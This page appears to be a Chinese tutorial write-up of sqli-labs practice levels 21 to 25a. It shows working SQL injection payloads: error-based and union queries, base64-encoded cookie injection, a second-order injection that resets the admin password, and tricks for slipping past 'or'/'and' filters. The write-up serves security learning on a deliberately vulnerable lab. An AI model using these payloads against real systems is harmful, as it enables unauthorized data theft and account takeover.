sqli21-25

请选择城市

热门
ABCDEFG
HIJKL
MNOPQRST
WXYZ

新疆

北京

深圳

广州

安徽

河南

合肥

兰州

韶关

白银

芜湖

蚌埠

天水

珠海

淮南

酒泉

汕头

佛山

马鞍山

张掖

淮北

江门

武威

铜陵

安庆

澳门

长沙

重庆

定西

福建

广东

甘肃

广西

贵州

湖北

河北

黑龙江

吉林

辽宁

宁夏

四川

天津

香港

西藏

湛江
A

安徽

澳门

B

北京

C

重庆

D

E

F

福建

G

广东

甘肃

广西

贵州
H

湖北

河北

河南

黑龙江

海南

湖南

J

吉林

江苏

江西

K

L

辽宁
M

P

Q

青海

R

S

四川

山东

上海

陕西

山西

T

天津

台湾
W

X

香港

新疆

西藏

Y

云南

Z

打造高能级科技创新平台

我的发布我的订单消息

帮助中心

服务热线：09962028123

免费发布任务

免费发布任务

首页 > 藏经阁

sqli21-25

空

网络安全 / 2024-12-19 / 14002浏览

Less21

代码分析
在这里插入图片描述 payload

D')and extractvalue(1,concat(0x7e,(select database()),0x7e))#base64转码后:RCcpYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSkpIw==

用burp抓第二个页面刷新重新获取cookie的数据包
在这里插入图片描述

Less22

代码分析
在这里插入图片描述

payload

RCJhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkj

在这里插入图片描述

Less23

代码分析
在这里插入图片描述

-1' union select 1,version(),'3#使用-1是为了让第一个select语句查询为空值，从而显示后边的select语句查询的内容

在这里插入图片描述

Less24

本关是关于二次排序的示例
二次排序注入思路：

黑客通过构造数据的形式，在浏览器或者其他软件中提交 HTTP 数据报文请求到服务端进行处理，提交的数据报文请求中可能包含了黑客构造的 SQL 语句或者命令。
服务端应用程序会将黑客提交的数据信息进行存储，通常是保存在数据库中，保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。
黑客向服务端发送第二个与第一次不相同的请求数据信息。
服务端接收到黑客提交的第二个请求信息后，为了处理该请求，服务端会查询数据库中已经存储的数据信息并处理，从而导致黑客在第一次请求中构造的 SQL 语句或者命令在服务端环境中执行。
服务端返回执行的处理结果数据信息，黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功。

此例中我们先注册一个admin#的账号，然后再修改密码

//pass_change.php第38行代码$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";注入过程：$sql = "update users set password = 'payload' where username = 'admin#' and password='$curr_pass'";

1.先注册admin’#账户
在这里插入图片描述

2.登录后修改密码时可以改掉原本admin的密码

在这里插入图片描述
这个二次排序注入漏洞可以修改他人账户的密码。利用的是账号注册时过滤不严格，使用了sql语句中的注释符#，还可以使用–+

代码分析
在这里插入图片描述

Less25

代码分析:
在这里插入图片描述

' union select 1,database(),user()--+

在这里插入图片描述

不含or,and的语句可以注入成功。
使用报错语句时and,or绕过方法

1.大小写变形2.双写绕过 oorr,aandnd3.url,hex编码4.添加注释/*or*/5.利用符号 and=>&&   or=>||

报错注入绕过or示例

http://127.0.0.1/sqli-labs-master/Less-25/?id=1%27oorr%20extractvalue(1,concat(0x7e,@@datadir))--+

在这里插入图片描述

Less25a

代码分析
在这里插入图片描述
1.联合注入

-1 union select 1,database(),user()#

在这里插入图片描述
2.时间盲注

点赞 0

收藏 0

我要打赏

热点文章

什么是网络安全等级保护

什么是网络安全等级保护

python编写sqli-labs11关

python编写sqli-labs11关

SQLI-Less-11-15

SQLI-Less-11-15

sqli-labs16-20

sqli-labs26-32

评论0

首页需求大厅大牛在凤雏创业基地云员工藏经阁软考试题 CTF挑战赛白帽服务入驻院校企业服务

咨询热线：

09962028123

联系地址

新疆巴州库尔勒市豪景大厦

E-mail

fengchuyunwei@163.com

友情链接：

新疆科技学院官网山石网科官网安恒信息官网网御星云官网绿盟科技官网深信服官网奇安信官网启明星辰官网天融信官网威努特官网亚信安全官网 360数字安全官网

© 2023-2024 凤雏运维版权所有，并保留所有权利新ICP备2021001141号-2